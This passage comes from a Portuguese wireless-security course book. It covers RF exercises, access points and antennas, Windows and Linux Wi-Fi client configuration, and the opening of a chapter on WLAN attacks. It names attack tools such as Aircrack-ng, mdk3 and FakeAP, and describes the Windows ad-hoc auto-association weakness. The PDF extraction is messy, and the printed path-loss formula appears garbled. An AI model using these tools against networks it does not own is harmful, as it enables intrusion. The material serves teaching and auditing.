processar o sinal RF ou RF Chain. O transmissor tem um único RF chain de saída e o receptor tem um único RF chain de entrada. Com Multiple-Input/Multiple-Output (MIMO), cada RF chain é capaz de transmitir e receber simultaneamente, o que aumenta consideravelmente a velocidade de transmissão da camada física (PHY). Além disso, o processamento simultâneo do receptor trata melhor de problemas com interferência por multipath.

21

22

Segurança em Redes sem Fio

Roteiro de Atividades 1
Atividade 1.1 – Matemática RF
Suponha que precisamos configurar uma WLAN. Nossa empresa decidiu cortar custos e determinou que estruturássemos a WLAN em Access Points baseados em Linux. Antes de configurá-los (o que aprenderemos a fazer no próximo Capítulo), teremos de instalar a interface WLAN, cabos e antena. Temos os seguintes equipamentos: 11 Uma interface de rede com potência de 200 mW; 11 Dois conectores de cabo; 11 Antena de 25 dBi. Considerando que 1.000 mW é equivalente a 1 W e que cada conector insere 1 dBi de perda, calcule a Effective Isotropic Radiated Power (EIRP) do sistema. Consulte o material do Capí tulo teórico correspondente para efetuar esse cálculo.

Atividade 1.2 – Órgãos reguladores
Consulte a Resolução 506 da Agência Nacional de Telecomunicações (Anatel), que inclui o Regulamento sobre Equipamentos de Radiocomunicação de Radiação Restrita, e conclua se o EIRP do seu sistema está de acordo com as normas da Anatel. Caso não esteja, proponha pelo menos duas soluções que resolvam o problema e deixem seu sistema em conformi dade com a norma estabelecida.

Atividade 1.3 – IEEE 802.11n
Vimos que o próximo padrão de redes 802.11 é IEEE 802.11n (Standard for Enhancements for Higher Throughput), que elevará a velocidade das WLAN para outro patamar. Assim como ocorreu com WPA (pré-padrão), que foi baseado no draft de 802.11i, hoje diversos fabricantes já estão oferecendo equipamentos baseados no draft de 802.11n. Suponha que seu gerente seja um “early adopter”, ou seja, uma pessoa que adota novas tecnologias tão logo elas surjam. Usando, como argumentos, características dos padrões 802.11a/b/g, requerimentos de tráfego entre equipamentos da WLAN e problemas que os atuais equipamentos baseados na versão draft de 802.11n apresentaram (consulte referên cias a seguir), convença-o a desistir de implantar esses novos equipamentos na organização. Referências: 11 Status of Project IEEE 802.11n: Standard for Enhancements for Higher Throughput: http://grouper.ieee.org/groups/802/11/Reports/tgn_update.htm 11 ZDNet: How to jam your neighbor’s Wi-Fi legally: http://blogs.zdnet.com
Capítulo 1 - Roteiro de Atividades

23

11 Tom’s Networking : Draft 802.11n Revealed: Part 1: The Real Story on Throughput vs. Range e Part 2: Interoperable? Not so much: http://www.tomsnetworking.com

Atividade 1.4 – WPA2 e RSN
Defina Wi-Fi (Protected Access WPA), Wi-Fi Protected Access (2WPA2) e Robust Security Network (RSN) com base no documento SP800-97 do NIST, explicando como certificação (WPA2) e conceito (RSN) se relacionam.

Atividade 1.5 – Projeto de WLAN com intersecção de células
Suponha que precisamos configurar WLAN para a nossa empresa. Foi realizado uma compra de cinco Access Points, um para cada departamento. Esses Access Points devem ser confi gurados de forma a evitar interferências entre as redes, evitando assim colisões e retrans missão de pacotes. A figura a seguir apresenta o raio de ação da irradiação da antena de cada Access Point. Todos os Access Points são 802.11b/g homologados para funcionamento no Brasil.

Diretoria

AP-05
Engenharia

AP-01 AP-02
Administração

AP-03
Recursos Humanos

AP-04
TI

Figura 1.8 Raio da irradiação da antena de cada AP.

Preencha a tabela a seguir com o canal que cada AP de estar configurado: AP 01 02 03 04
Segurança em Redes sem Fio

SSID Diretoria Administração RH TI Engenharia

CANAL

05

24

2
WLAN: equipamentos e configuração
objetivos
Apresentar os dispositivos típicos de uma WLAN, a configuração de clientes e os problemas relacionados, em redes Windows e Linux; identificar os componentes de uma rede sem fio.

conceitos

Configuração de clientes WLAN.

Introdução
Access Point (AP): 11 Elemento-chave de uma WLAN. 11 Ponto de acesso à rede cabeada. 11 Principais modos: 22 Root (padrão). 22 Repeater. 22 Bridge. O AP é o principal elemento de uma WLAN. Normalmente, é responsável por conectar os

q

clientes à rede cabeada, por meio da interface Ethernet. Esse modo é conhecido como Root. Outros modos de operação: 11 Bridge: usado para ligar dois segmentos de rede cabeados por meio de uma rede sem fio; 11 Repeater: um AP em modo Repeater se conecta a um AP em modo Root como cliente, e os clientes, por sua vez, se conectam ao AP Repeater.
Capítulo 2 - WLAN: equipamentos e configuração

Exercício de nivelamento 1 e WLAN
O que é uma WLAN?

25

Acess Point
Opções típicas: 11 Potência ajustável. 11 Firewall básico. 11 Antenas destacáveis. 11 Filtro por MAC. 11 Servidor DHCP para WLAN e LAN (portas RJ-45). 11 Atualização de firmware. Os APs mais comuns do mercado são, na realidade, Broadband Routers; ou seja, não se limitam ao papel de “switch sem fio” – oferecem diversas funcionalidades interessantes a um dispositivo e normalmente exercem o papel de gateway. Uma função característica de um gateway presente nesses equipamentos é a de servidor DHCP, importante na alocação dinâmica de endereços IP para os clientes que se associam ao AP. Os endereços mais usados nesse tipo de servidor são os das classes 10/8 (10.0.0.0-10.255.255.255), 172.16/12

q

(172.16.0.0-172.31.255.255) e 192.168/16 (192.168.0.0). Essas redes são especificadas na RFC 1918 (Address Allocation for Private Internets). O ajuste da potência de transmissão é mal interpretado como sendo uma medida de segu rança. Possui alguma utilidade como maneira de se evitar que atacantes capturem tráfego na preparação de ataques contra a WLAN (como WEP, WPA; mas é difícil conter as ondas de rádio). É melhor que o administrador de rede se empenhe em tornar a WLAN segura por criptografia e outros mecanismos do que pela diminuição da potência, que ainda pode impedir que certos clientes se conectem. Outra função mal interpretada como associada à segurança é o filtro por endereço Medium Access Control (MAC), que restringe a associação de clientes a apenas uma relação previamente conhecida. Essa opção detém apenas usuá rios comuns, já que é trivial alterar esse endereço para se fazer passar por outra interface. Outra função típica é a de firewall, ou seja, um filtro de pacotes básico com base em ende reços e portas TCP/IP de origem e destino. Por meio dessa funcionalidade é possível, por exemplo, ter acesso à interface administrativa não apenas por intermédio da WLAN, o que é mais comum, mas também por meio da LAN. A atualização de firmware é um aspecto interessante para explorar os recursos do equipamento com um sistema operacional do dispositivo alternativo ou para eli minar bugs e vulnerabilidades de segurança.

Clientes WLAN
Fit AP:
Segurança em Redes sem Fio

q

11 Também chamados de Fat APs. 11 Inteligência no AP. 11 Configuração individual. 11 Administração trabalhosa. Thin AP: 11 Figura do switch centralizado. 11 APs “burros”.

26

11 Configuração centralizada.

w
Para verificar a compatibilidade de uma interface sob Linux, consulte o site: http://linux-wless. passys.nl/

A escolha de clientes é muito importante, especialmente quando a compatibilidade sob Linux importa. Outro aspecto importante é a incompatibilidade entre marcas diferentes, em especial nos padrões proprietários de aceleração – Afterburner/SpeedBooster da Broadcom e D-Link AirPlus Extreme, por exemplo. Dê preferência para as interfaces com chipsets Atheros ou Ralink. Há ferramentas de auditoria muito úteis que podem ser executadas somente com uma determinada interface e driver.

Figura 2.1 Tipos de interfaces para redes sem fio.

Conceitos sobre antenas
Polarização: 11 Horizontal. 11 Vertical. 11 Ganho medido em dBi. Beamwidth: 11 Horizontal. 11 Vertical. 11 Perdas no caminho (Free Space Path Loss) – maior fonte de perda. 22 Maior frequência, maior FSPL, menor distância.

q

11 Polarização: orientação física da antena. Ondas de rádio são compostas de dois campos, elétrico e magnético. Na polarização Horizontal, o campo elétrico é paralelo à superfície da Terra enquanto que, na Vertical, o campo elétrico é perpendicular; 11 Ganho: medido em dBi (decibels referenced to an isotropic radiator). Não é possível criar um irradiador isotrópico, como o sol, apenas 360º no plano Horizontal. O padrão de irra diação tem a forma de uma rosca. Antenas, por seu caráter passivo, não fazem nada mais do que “espremer” a rosca para aumentar a abrangência;
Capítulo 2 - WLAN: equipamentos e configuração

11 Beamwidth: largura do sinal RF que a antena transmite, aumento e diminuição no ganho de uma antena. É medido em graus e também tem como referência a superfície da Terra. Valores mais comuns por tipo de antena: 22 Omni: H 360º V 7-8º; 22 Patch: H 30-180º V 6-90º; 22 Yagi: H 30-78º V 14-64º; 22 Dish (prato): H 4-24º V 4-21º; 22 Free Space Path Loss: perda no sinal RF por dispersão, principalmente. Fórmula para FSPL, onde “F” é frequência e “d”, a distância em metros: FSPL (dB) = 32.5 + 20 log F + log d.

27

A 100 metros de distância, por exemplo, a perda por PL é de 80.23 dB.

Antena Omnidirecional (dipolo)
11 Mais comum. 11 Irradia energia igualmente em torno de seu eixo. 11 Aumento no ganho. 22 Rosca se torna uma panqueca.

q

Figura 2.2 Antena Omnidirecional (dipolo).

Antena Semidirecional
11 Painel e Yagi (ilustrações). 11 Irradia mais em uma direção. 11 Alto ganho, normalmente a partir de 8.5 dBi. 11 Útil para bridge entre pontos um pouco mais distantes.

q

Segurança em Redes sem Fio

Figura 2.3 Antena Semidirecional.

28

Antena altamente direcional
11 Comunicação ponto a ponto. 11 Beamwidth estreito. 22 Foco direcionado. 22 Maior alcance.

q

Figura 2.4 Antena altamente direcional.

Os gráficos que ilustram o padrão de irradiação foram gerados pelo Numerical Electromagnetic Code (NEC) Finite-Element Antenna Simulator – Lawrence Livermore Laboratories.

Amplificadores
11 Aumentam a amplitude de um sinal de RF e a sensibilidade. 11 Dois tipos: 22 Unidirecional (envio). 22 Bidirecional (envio e recepção). 11 Ganho fixo ou variável.

q

Atenuadores
11 Necessários para provocar perda calculada. 11 Evitam violações nas determinações de FCC/Anatel.

q

Figura 2.5 Amplificador.

Splitter
11 Divide sinal em múltiplos sinais RF. 11 Aplicação em múltiplas antenas. 11 Não recomendado. 22 Introduz perda.

q

Capítulo 2 - WLAN: equipamentos e configuração

29

Figura 2.6 Splitter.

Conectores
11 Proprietários. 11 Impedância deve combinar com cabos. 22 Voltage Standing Wave Ratio (VSWR). 11 Mais comuns: N-type e SMA.

q

Figura 2.7 Conectores.

Cabos
11 Principais: Andrew, Times Microware e Belden. 11 Mais usado: Times Microwave LMR. 22 Maior número, menor perda. 22 LMR-100, LMR-400 e LMR-800. Cuidados: 11 Mais curto possível (perda). 11 Mesma impedância dos outros componentes (VSWR) e frequência superior (2.5 GHz para WLAN 2.4 GHz). 11 Procure por cabos manufaturados, não montados. 11 Escolha aquele com menor perda.
Segurança em Redes sem Fio

q

Exercício de fixação 1 e WLAN: equipamentos e acessórios
1. O que é um AP?

30

2. O que é polarização?

3. Quais os tipos de antenas existentes?

Configuração de clientes
Windows
11 Plataforma nativa de praticamente todas as interfaces. 11 Wireless Zero Configuration Service (WZCSVC). 11 Sem suporte a RFMON. 22 Captura de quadros 802.11 de gerenciamento. 11 Esquemas mais comuns: 22 Autenticação: WEP (inseguro), WPA, WPA-PSK, WPA2 e WPA2-PSK. 22 Criptografia: TKIP (WPA) e AES (WPA2). 22 EAP Types: PEAP (PEAPv0/EAP-MSCHAPv2) e EAP-TLS. Lembretes no Windows: 11 Desativar WZCSVC, caso opte por controlar a interface pelo serviço do fabricante. 11 Restringir associações a redes de infraestrutura ou ad-hoc (Advanced). Definição dos parâmetros de WLAN: 11 WZCSVC. 22 Associação ao AP simplificada. O suporte a interfaces WLAN no Microsoft Windows está voltado à facilidade de uso. Alguns detalhes úteis a um usuário mais avançado – como BSSID do AP – são omitidos, de forma que dois APs distintos com o mesmo SSID são exibidos como sendo um único SSID.
Capítulo 2 - WLAN: equipamentos e configuração

q

É importante observar que o uso do serviço WZCSVC é facultativo na maioria das vezes, já que as interfaces normalmente são acompanhadas de drivers do fabricante. Entretanto, é preciso escolher qual dos serviços controlará a interface – se escolher pelo serviço do fabri cante, devemos desativar o WZCSVC, conforme veremos a seguir.

31

Em janeiro de 2006, durante a conferência ShmooCon 2006, Mark “Simple Nomad” Loveless anunciou uma vulnerabilidade na escolha automática de redes do WZCSVC. Suponha que o notebook de Alice está configurado para usar um SSID “CASA”. Fora do alcance de seu AP, se Bob configurar sua estação com o mesmo SSID, o notebook de Alice se associa à rede ad-hoc de mesmo nome. Na próxima vez que Alice ligar seu notebook sem um AP com SSID “CASA” nas proximidades, ele passará a anunciar uma rede ad-hoc com SSID “CASA”.

Figura 2.8 Desativando o WZCSVC. Figura 2.9 Restringir associações a redes de infraestrutura ou ‘ad-hoc’ (Advanced).

Linux
11 Drivers ainda constituem um problema. 11 Chipsets melhor suportados por drivers e ferramentas: 22 Prism, Orinoco e Atheros (nesta ordem). 11 Demais chipsets: 22 Suporte muitas vezes parcial. 22 Sem o modo RFMON. 11 Drivers: 22 Hostap – chipset Prism 22 WLAN-ng. 22 MADWIFI – chipset Atheros. 22 Wavelan – chipset Orinoco. 22 RT73 – Ralink. 22 Ndiswrapper – instalação de driver Windows (.INF) sob Linux. 11 Utilitários: 22 Wireless Tools (WT).
Segurança em Redes sem Fio

q

22 iwconfig, iwlist, iwspy, iwpriv, ifrename. 11 Definição dos parâmetros de WLAN: 22 Iwconfig: 33 Canal, SSID, modo, chave e taxa de transmissão.

32

11 Interfaces Atheros com módulo MadWifi: 22 wlanconfig. 11 Modo “master”: 22 Primeiro passo para transformar uma estação em um AP. Alguns softwares e sua compatibilidade entre os chipsets: A = Atheros cards / O = Orinoco cards / P = Prism cards / R = Ralink cards. 11 Kismet AOPR; 11 Wellenreiter O; 11 Karma APR; 11 Aircrack AOPR; 11 Aircrack-ng AOPR; 11 Airsnort OP; 11 WEPAttack AOPR; 11 WEPCrack AOPR;

q

w
O site “Linux wireless LAN support” compila interfaces suportadas em Linux por fabricante, tipo de interface (PCI, USB, PCMCIA etc.) ou chipset, facilitando a escolha de um usuário mais exigente.

11 FakeAP P (Airbase-ng AR); 11 Void11 P (mdk3 AR); 11 Wifitap AP; 11 Wireshark AOPR. Drivers baseados nos chipsets Prism, Atheros e Ralink são altamente recomendáveis, pois são os mais suportados por utilitários Linux. Isso se deve às ferramentas disponíveis que, na maioria dos casos, exigem drivers HostAP (chipset Prism), MadWifi (chipset Atheros) e RT73 (chipset Ralink). As marcas e modelos disponíveis no mercado são várias e o suporte a Linux é imprevisível.

Capítulo 2 - WLAN: equipamentos e configuração

33

34

Segurança em Redes sem Fio

Roteiro de Atividades 2
Atividade 2.1 – Configuração de um cliente Windows
Neste primeiro exercício, configuraremos um cliente Windows para uma rede típica. A configuração de um cliente Windows para uma WLAN WEP, para uma WPA Personal (WPA-PSK) ou para uma WPA2-Personal (WPA2-PSK) difere apenas na solicitação de uma senha. Note que nem todas as interfaces de rede são capazes de se associar a redes WPA e WPA2, Personal (PSK) ou Enterprise. Isso se deve ao suporte de hardware e software (drivers), o que não existia para alguns equipamentos mais antigos. Portanto, esse problema não acontecerá nesta atividade, uma vez que as interfaces de rede adotadas são compatí veis com os padrões de segurança mais recentes.

Verificando o status do serviço Wireless Zero Configuration
Se a instalação do driver da interface de rede WLAN ocorreu com sucesso, é bem provável que o gerenciamento da interface seja feito por meio do serviço Wireless Zero Configuration (WZCSVC) ou “Configuração zero sem fio”, padrão no Windows XP. Para verificar se o serviço está ativo, siga os seguintes passos:
1. Siga a seguinte sequência de menus, a partir do menu “Start/Iniciar”:

11 Windows XP em inglês: “Start”, “Control Panel”, “Administrative Tools” e “Services”. 11 Windows XP em português: “Iniciar”, “Painel de Controle”, “Ferramentas Administrativas” e “Serviços”.

Capítulo 2 - Roteiro de Atividades

35

2. Quando o serviço está ativo, tendo sido disparado quando o sistema foi ligado (caso

típico), os campos “Status” e “Startup Type” exibem os valores “Started” e “Automatic”, respectivamente. Isso pode ser confirmado clicando com o botão direito do mouse sobre a entrada “Wireless Zero Configuration” (conforme figura anterior), e em seguida selecio nando “Properties/Propriedades”.
3. O serviço também pode ser iniciado via prompt de comando executando o comando net

start wzcsvc. Uma vez garantido que o serviço WZCSVC esteja em operação, podemos partir para a confi guração da interface WLAN.

36

Segurança em Redes sem Fio

Configuração básica de uma interface de rede
A configuração de uma interface WLAN em Windows XP é bem simples e intuitiva. Existem diversos caminhos para se chegar à interface gráfica de configuração, mas aqui descreve remos o que consideramos típico de uma instalação padrão de Windows XP. A interface de seleção de redes disponíveis pode ser chamada tanto pela opção “Open Network Connections” quanto pela opção “View Available Wireless Networks”. Seleciona remos a primeira opção, para que tenhamos uma visão mais ampla de como a interface WLAN se comporta no sistema. A interface WLAN se comporta como uma interface Ethernet para o sistema, inclusive na forma como recebe os pacotes da camada física da rede. Veremos que uma vez associado à rede com auxílio do serviço WZCSVC ou do driver do fabricante, o cliente recebe tráfego de rede como se fosse uma interface Ethernet. Para a pilha TCP/IP do sistema operacional (SO) não importa se a camada de rede (IP) recebe pacotes de uma interface Token Ring, 802.11 ou Ethernet – o driver se encarrega de entregar para a camada IP pacotes no formato esperado
Capítulo 2 - Roteiro de Atividades

por esta camada de rede. Ao clicar duas vezes sobre a interface de rede WLAN, finalmente chegamos à interface gráfica do Wireless Zero Configuration. Redes sem nenhum mecanismo de segurança apresentam a legenda “Unsecured wireless network”. Para se associar à rede, basta clicar sobre a rede desejada (ESR-WIFISEG). Uma mensagem de confirmação normalmente é exibida, confirmando se o usuário realmente deseja associar o cliente a uma rede sem segurança.

37

Ao clicar em “Connect Anyway/Conectar de qualquer forma”, o processo de associação é iniciado. Uma vez associada, a interface é entregue à camada IP de TCP/IP que, tipicamente, tenta configurar a interface por DHCP. Quando a interface gráfica do WZCSVC exibir o texto “Connected/Conectado”, sua interface WLAN já foi configurada com um endereço IP e a configuração está concluída. Note que, em nenhum momento, a interface gráfica informa o canal da rede em questão.

Considerações sobre segurança
Tal como uma interface Ethernet, a interface WLAN normalmente é configurada automaticamente com algumas opções que recomendamos desativar, em especial as relativas a redes ad-hoc. Selecione na janela “Network Connections” (há outros caminhos também) a interface em questão (Wi-Fi) com o botão direito do mouse e, depois, escolha a opção “Properties”. Depois, selecione a aba “Wireless Networks”, conforme mostrado na ilustração a seguir.
Segurança em Redes sem Fio

38

Clique no botão “Advanced” (seção inferior direita) para definir os tipos de rede aos quais o cliente poderá se associar.

A possibilidade de associação automática a redes preferidas (Preferred) é um dos grandes problemas de clientes WLAN Windows. Como foi apresentado na conferência hacker ShmooCon 2006, a forma como o WZCSVC seleciona as redes pode levar à associação com apenas associações com Access Points sejam permitidas, ou seja, em uma rede infraestrutu rada. Desmarcar a opção “Automatically connect…” (mostrada na ilustração anterior) impede que o cliente se associe automaticamente a redes não conhecidas previamente.
Capítulo 2 - Roteiro de Atividades

um nó ad-hoc com o mesmo nome da rede preferida. Configure a interface de modo que

Atividade 2.2 – Configuração de um cliente Linux
Assim como ocorre em um cliente Windows, antes de configurar a interface WLAN é necessário verificar se o driver (módulo em Linux) está devidamente instalado e carregado. Em seguida, configuraremos a interface para as WLAN mais típicas: aberta, WEP e WPA/WPA2.

39

Não utilizaremos interfaces gráficas para a configuração em Linux porque variam de distri buição para distribuição. A configuração por linha de comando, por outro lado, dá ao aluno uma visão mais detalhada das etapas da configuração de uma interface WLAN. Antes de qualquer comando, certifique-se de que seu usuário detém privilégios de superu suário – ou seja, root. Em sua máquina virtual VMware do BackTrack 3, execute o seguinte comando em um console:

# sudo su –

Verificando a presença e a atividade dos drivers
Para verificar se já existem interfaces 802.11 reconhecidas, execute o comando iwconfig sem nenhum parâmetro.

# iwconfig lo no wireless extensions.

eth0

no wireless extensions.

rausb0

IEEE 802.11g Mode:Managed

ESSID:off/any Frequency:2.437 GHz Access Point: Not-Associated

Bit Rate:54 Mb/s RTS thr:2347 B

Tx-Power:25 dBm Fragment thr:2346 B

Encryption key:off Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid frag:0 Missed beacon:0

Rx invalid nwid:0

Rx invalid crypt:0 Invalid misc:0

Tx excessive retries:0

A resposta do comando informou que há uma interface com nome rausb0 ativa, ou seja, não é necessário instalar ou carregar módulos (drivers). No caso do nosso laboratório, encon traremos sempre interfaces com nome rausb0, normalmente o nome padrão atribuído a interfaces Ralink com módulo rt73. Caso a resposta do comando anterior informe que não há nenhuma interface com exten sões wireless (no wireless extensions), será necessário instalar ou simplesmente carregar o módulo (driver). Uma vez que o módulo é rt73:
Segurança em Redes sem Fio

# modinfo rt73 # modprobe -v rt73
Depois de instalado, o sistema lista o driver como instalado. Confirme se os módulos foram carregados, executando o seguinte comando:

# lsmod

40

Apenas para informação, os arquivos de módulos normalmente ficam nos seguintes diretórios:

/lib/modules/2.6.x

Comandos básicos de configuração
Linux oferece um conjunto de utilitários essenciais na configuração de uma interface WLAN. O utilitário que exerce o papel de supplicant na infraestrutura 802.1x é wpa_supplicant. O conjunto de ferramentas “Wireless Tools for Linux”, presente em praticamente qualquer distribuição Linux, é composto das seguintes ferramentas: 11 Iwconfig : parâmetros básicos; 11 iwlist: varredura por redes, listando frequências oferecidas pelo AP, taxas de trans missão (bit-rate) e outras configurações; 11 iwspy : exibe qualidade do link; 11 iwpriv : manipulação de extensões wireless específicas de um driver (private); 11 ifrename: permite nomear interfaces com base em critérios estáticos.

Configuração básica de uma interface de rede – rede aberta
Para buscar por redes nos arredores, execute os seguintes comandos:

# ifconfig rausb0 up # iwlist rausb0 scan rausb0 Scan completed : Cell 01 - Address: 00:14:BF:XX:XX:XX ESSID:”rnpesr” Protocol:IEEE 802.11g Mode:Managed Frequency:2.437 GHz (Channel 06) Quality:0/100 level:-256 dBm Encryption key:off Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9
Capítulo 2 - Roteiro de Atividades

Signal level:-32 dBm

Noise

Mb/s 12 Mb/s; 48 Mb/s Extra:bcn_int=100 Extra:atim=0

41

Pela saída desse comando, é possível conhecer a rede à qual nosso cliente se conectará. O exemplo mostra o SSID “rnpesr” e o canal é 6 (2.437 GHz). De posse desses dados, já podemos configurar a interface para uma rede aberta. Verifique qual será o SSID e canal utilizados no laboratório:

# iwconfig rausb0 mode managed essid rnpesr channel 6 # iwconfig rausb0 rausb0 IEEE 802.11g Mode:Managed 00:14:BF:XX:XX:XX Bit Rate:54 Mb/s RTS thr:2347 B Tx-Power:25 dBm Fragment thr:2346 B ESSID:”rnpesr” Frequency:2.437 GHz Access Point:

Encryption key:off Power Management:off Link Quality:100/100 Rx invalid nwid:0 Signal level:-35 dBm Rx invalid crypt:0 Invalid misc:0 Noise level:-256 dBm Rx invalid frag:0 Missed beacon:0

Tx excessive retries:0

11 O modo managed indica que a interface está sendo configurada para se associar a um AP. Outros modos comuns são: monitor (para captura de quadros de dados, controle e gerenciamento), master (permite que a interface aja como AP) e ad-hoc (células sem um AP). Uma vez configurada a interface, já é possível configurar um endereço IP ou configurar a interface automaticamente por DHCP.

# dhcpcd rausb0

Configuração básica de uma interface de rede – WEP
A configuração de uma rede WEP 104 bits, popularmente conhecida como 128 bits, difere em apenas um parâmetro a mais do comando iwconfig: key, com a chave em hexadecimal.

# iwconfig rausb0 channel 6 essid rnpesr mode managed key 11111AAAAA11111AAAAAEEEEE0
Depois de configurada a interface, já é possível configurar parâmetros de rede (IP, máscara de rede, gateway), seja manualmente ou por DHCP. Uma interface configurada para uma rede WEP apresenta a seguinte configuração:
Segurança em Redes sem Fio

# iwconfig rausb0 rausb0 IEEE 802.11g Mode:Managed 00:14:BF:XX:XX:XX Bit Rate:54 Mb/s RTS thr:2347 B Tx-Power:25 dBm Fragment thr:2346 B ESSID:”rnpesr” Frequency:2.437 GHz Access Point:

42

Encryption key:1111-1AAA-AA11-111A-AAAA-EEEE-E0 mode:restricted Power Management:off Link Quality:100/100 dBm Rx invalid nwid:0 Rx invalid crypt:0 Invalid misc:0 Signal level:-57 dBm

Security

Noise level:-256

Rx invalid frag:0 Missed beacon:0

Tx excessive retries:0

Configuração básica de uma interface de rede – WPA
A configuração de uma rede com WPA requer um utilitário adicional: wpa_supplicant. Esse utilitário impõe algumas limitações, uma vez que não oferece suporte a todos os drivers Linux. Outro fator limitante é a própria interface, que pode não oferecer suporte a WPA, assim como mecanismos de segurança mais recentes. Atualmente (versão 0.5.10), os únicos drivers com suporte são: 11 hostap: Host AP driver (Intersil Prism2/2.5/3). 11 madwifi: MADWIFI 802.11 support (Atheros etc.). 11 atmel: ATMEL AT76C5XXx (USB, PCMCIA). 11 wext: Linux wireless extensions (generic). 11 ndiswrapper: Linux ndiswrapper. 11 ipw: Intel ipw2100/2200 driver. 11 wired: wpa_supplicant wired Ethernet driver. Caso você esteja usando um driver diferente, o processo de autenticação ou associação não será concluído. A configuração inicial da interface é igual à de uma rede aberta.

# iwconfig rausb0 mode managed essid rnpesr channel 6
Usaremos apenas alguns parâmetros do comando wpa_supplicant; para uma lista completa, consulte a ajuda on-line do mesmo comando “man wpa_supplicant” ou, simplesmente, execute o comando sem parâmetros. As opções que utilizaremos são: -B = run daemon in the background -c = configuration file -i = interface name -d = increase debugging verbosity (-dd even more) -D = driver name
Capítulo 2 - Roteiro de Atividades

Para a rede WPA configurada e antes de executarmos o comando wpa_supplicant..., editaremos em qualquer editor de texto (gedit, vi) o arquivo de configuração wpa-psk-tkip. conf em “/etc/wpa_supplicant”. Se o diretório não existir, crie o mesmo com o comando mkdir /etc/wpa_supplicant :

# WPA-PSK/TKIP

ctrl_interface=/var/run/wpa_supplicant

43

network={ ssid=”rnpesr” key_mgmt=WPA-PSK proto=WPA pairwise=TKIP group=TKIP psk=”chave compartilhada”
} Para testar se a configuração está correta, execute o seguinte comando:

# wpa_supplicant -d –Dwext –irausb0 -c/etc/wpa_supplicant/wpa-psktkip.conf
Atenção ao driver e interfaces compatíveis com o WPA para obter sucesso na associação. A opção “-d” exibirá todas as mensagens da transação. Para configuração automática, a opção “-B” é mais conveniente, já que mantém o programa em execução, porém em segundo plano (background).

# wpa_supplicant -B –Dwext –irausb0 -c/etc/wpa_supplicant/wpa-psktkip.conf
Uma vez concluído com sucesso (veja com atenção a saída do comando com a opção “-d ” ), a associação é realizada. Abaixo, uma saída típica indicando o sucesso da associação:

State: GROUP_HANDSHAKE -> COMPLETED CTRL-EVENT-CONNECTED - Connection to 00:14:bf:xx:xx:xx completed (auth) EAPOL: External notification - portValid=1 EAPOL: External notification - EAP success=1 EAPOL: SUPP_PAE entering state AUTHENTICATING EAPOL: SUPP_BE entering state SUCCESS EAP: EAP entering state DISABLED EAPOL: SUPP_PAE entering state AUTHENTICATED EAPOL: SUPP_BE entering state IDLE
Segurança em Redes sem Fio

EAPOL: startWhen --> 0
Uma vez associado à rede, o cliente pode prosseguir com a configuração dos parâmetros de rede, normalmente por meio da execução de um cliente DHCP. Note que o processo do wpa_supplicant deverá permanecer ao longo de toda a duração da associação.

# dhcpcd rausb0

44

Configuração com a ferramenta wicd
O wicd é um gerenciador de redes sem-fio para Linux, que visa fornecer uma interface gráfica simples para auxiliar na conexão à redes Wi-Fi. Essa ferramenta simplifica o processo de estabelecimento de conexão a uma rede Wi-Fi, podendo estar configurada com WEP, WPA-PSK ou WPA-Enterprise. Para utilizar o wicd é necessário verificar se o daemon wicd está em execução:

# ps ax | grep wicd
Caso o daemon não esteja em execução, execute o seguinte comando:

# wicd
A interface gráfica de manipulação do wicd é iniciada a partir do comando wicd-client ou através do menu “Iniciar” (Application Launcher Menu), “Internet”, “Wicd Network Manager”. A seguinte tela será aberta:

Na tela inicial do wicd é possível visualisar as redes disponíveis. Note que ao lado do SSID existe a informação da potência do sinal, configuração de segurança e canal. Para se conectar, escolha uma rede e clique no botão “Connect” logo abaixo o SSID da rede.

Capítulo 2 - Roteiro de Atividades

45

Caso a rede necessite de uma configuração de segurança (WEP, WPA etc), ao clicar em conectar, a seguinte tela será exibida:

Clique em “OK” e, em seguida, no botão “Properties” logo abaixo do SSID da rede escolhida. A seguinte tela será exibida:

46

Segurança em Redes sem Fio

Escolha o método de autenticação na caixa de seleção acima do campo “Key”. Para utili zação de uma chave pré-compartilhada (PSK), escolha a opção “WPA 1/2 (Preshared Key)” e informe a chave no campo “Key”, como pode ser visto na figura a seguir:

Clique em “OK” e na tela principal do wicd, depois clique em “Connect”. A conexão será efe tuada e a informação do endereço IP aparecerá na barra de status do wicd, como pode ser
Capítulo 2 - Roteiro de Atividades

visto na figura a seguir:

47

l
Saiba mais
O wicd é um frontend para os comandos padrão de manipulação de redes Wi-Fi no Linux, como: iwconfig, iwlist, wpa_supplicant e dhclient/dhcpcd.

Para desconectar da rede, clique no botão “Disconnect”, abaixo do SSID da rede escolhida. Se desejar que determinada rede configurada se conecte automaticamente ao iniciar o wicd, habilite a opção “Automatically connect to this network”.

48

Segurança em Redes sem Fio

3
Auditoria em redes sem fio (parte 1)
objetivos
Apresentar as principais classes de ataques a redes sem fio; analisar e capturar tráfego MAC 802.11; ensinar a utilização dos analisadores de tráfego em uma WLAN.

conceitos

Principais tipos de ataques e as características da camada MAC de 802.11; captura de tráfego e análise por meio de ferramentas como Wireshark, TCPdump e Airodump-ng.

Introdução
Estima-se que 70% dos ataques bem-sucedidos contra Access Points e clientes de WLANs ocorrem pelas seguintes causas (Gartner): 11 Configuração mal realizada. 11 Concepções erradas sobre segurança em redes sem fio. 11 Risco envolvido em não entender as vulnerabilidades ou assumir que a rede está segura a priori. Redes sem fio estão cada vez mais presentes nas empresas, casas e espaços públicos. Os

q

problemas de WEP, que tornaram as WLANs notórias pela insegurança, já foram sanados e hoje existem implementações altamente seguras de WLAN. Já é hora de apontar os verda deiros culpados pela insegurança: os administradores.

Ataques a redes sem fio
Seja um usuário doméstico ou um administrador de uma WLAN de uma pequena empresa, em qualquer caso é preciso considerar aspectos de segurança na configuração de um AP.
SOHO Small Office Home Office. Redes domésticas ou de pequenos escritórios.

Os APs voltados para o mercado SOHO, adequados para usuários domésticos e pequenas empresas, já contam com recursos de segurança suficientes para a implantação de uma rede segura, ou seja: que não permita acesso não autorizado, que proteja os dados de interceptação e leitura e que impeça um atacante de inserir tráfego arbitrário.

Concepções erradas
11 “Utilizamos filtro por endereços MAC.” 11 “WEP é melhor que nada.”

q

Capítulo 3 - Auditoria em redes sem fio (parte 1)

49

